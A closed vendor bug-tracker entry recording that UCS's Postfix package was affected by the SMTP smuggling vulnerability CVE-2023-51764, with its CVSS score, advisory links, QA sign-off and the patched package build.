First Last Prev Next    This bug is not in your last search results.
Bug 56957 - SMTP Smuggling through Postfix
SMTP Smuggling through Postfix
Status: CLOSED FIXED
Product: UCS
Classification: Unclassified
Component: Mail
UCS 5.0
Other Linux
: P5 normal (vote)
: UCS 5.0-6-errata
Assigned To: Alexander Steffen
Tobias Wenzel
https://git.knut.univention.de/univen...
:
Depends on:
Blocks: 56988
  Show dependency treegraph
 
Reported: 2024-01-03 12:09 CET by Jan-Luca Kiok
Modified: 2024-01-17 13:43 CET (History)
2 users (show)

See Also:
What kind of report is it?: Security Issue
What type of bug is this?: ---
Who will be affected by this bug?: ---
How will those affected feel about the bug?: ---
User Pain:
Enterprise Customer affected?:
School Customer affected?:
ISV affected?:
Waiting Support:
Flags outvoted (downgraded) after PO Review:
Ticket number:
Bug group (optional):
Max CVSS v3 score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Jan-Luca Kiok univentionstaff 2024-01-03 12:09:15 CET 
Our Postfix version is affected by CVE-2023-51764: https://security-tracker.debian.org/tracker/CVE-2023-51764

In the current configuration it is possible to spoof MAIL FROM (and bypassing SPF) by injecting a mail into another: https://www.postfix.org/smtp-smuggling.html

If I read that right there is a fix available, so we should patch our Postfix versions in UCS 5 and possibly 4.4 and release it.
Comment 2 Jan-Luca Kiok univentionstaff 2024-01-05 10:37:24 CET 
CVSS score provided by SUSE: https://www.suse.com/security/cve/CVE-2023-51764.html
Comment 3 Tobias Wenzel univentionstaff 2024-01-16 16:02:31 CET 
QA:

- code changes OK
- changelog OK
- advisory OK
- manual OK

-> waiting for jenkins to set verified.
Comment 4 Tobias Wenzel univentionstaff 2024-01-17 09:14:22 CET 
Package was built with

Package: univention-mail-postfix
Version: 14.0.7-1
Branch: ucs_5.0-0
Scope: errata5.0-6

-> jenkins jobs look good
First Last Prev Next    This bug is not in your last search results.